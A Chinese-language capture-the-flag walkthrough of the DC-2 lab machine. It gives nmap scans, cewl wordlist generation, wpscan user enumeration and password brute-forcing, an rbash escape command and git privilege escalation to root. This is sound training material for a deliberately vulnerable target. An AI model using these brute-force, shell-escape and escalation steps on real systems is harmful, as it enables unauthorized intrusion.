DC靶场的下载、安装与访问在上一篇的文章中。
1、使用nmap快速扫描的命令:
nmap -sP --min-hostgroup 1024 --min-parallelism 1024 192.168.120.0/24
识别到靶场主机ip
编辑
2.使用命令:
nmap -A -p- -T4 192.168.120.133
探测靶场突破口
编辑
如图,可以看到,开放了80端口-http服务,7744端口-ssh服务。
3.访问80端口,寻找进一步突破口。如果直接使用ip访问会跳转到http://dc-2/,而无法正常加载出来。所以需要我们去添加hosts文件,跳转域名来访问靶场ip。
Windows:
可以访问本地hosts,打开C:\Windows\System32\drivers\etc,修改hosts文件
编辑
Linux:在/etc/hosts文件中添加域名。
打开浏览器,访问即可。
编辑
4.根据flag提示,需要使用cewl工具来生成字典。
cewl详细实用攻略之前写过这一篇文章。
cewl http://dc-2/ -w dc-2.txt
编辑
5.使用wpscan扫描工具来获取用户名。
wpscan --url dc-2 -e u
wpscan详细使用教程之前写过文章。
编辑
找到三个用户名,admin,jerry,tom,然后将它们写入一个用户名字典
编辑使用命令:
wpscan --url dc-2 -U 2 -P dc-2.txt
使用得到的用户名还有cewl得到的密码尝试爆破,成功爆破出两个账户密码
用户jerry 密码adipiscing
用户tom 密码parturient
编辑
6.使用dirb扫描http://dc-2/
dirb http://dc-2 /usr/share/wordlists/dirb/big.txt
编辑
7.访问/wp-admin,成功出现后台登录界面
编辑
8.使用爆破的账户密码,登录成功
编辑
9.在pages中,成功查看到flag2
编辑10.此时这条路行不通了,但之前我们还扫出来一个7744端口-ssh服务,我们尝试用破解出来的后台密码连接ssh,最终只有tom可以登录。
编辑
查看当前目录,看到了flag3.txt。但是cat不可以使用,我们就使用vi来查看。
编辑
编辑
根据提示,告诉我们jerry的权限比tom更高,要我们提权至jerry
编辑
我们需要rbash绕过,输入下面的命令。
BASH_CMDS[a]=/bin/bash a /bin/bash export PATH=PATH:/sbin:/bin
编辑
成功登陆到jerry账号。
编辑
查看flag4.txt
编辑
从中可以得出,需要我们使用git提权。
git提权的详细使用教程之前写过一篇文章。
编辑
此时,已经拿到了root权限
编辑
提权成功,拿到了最后的flag
编辑
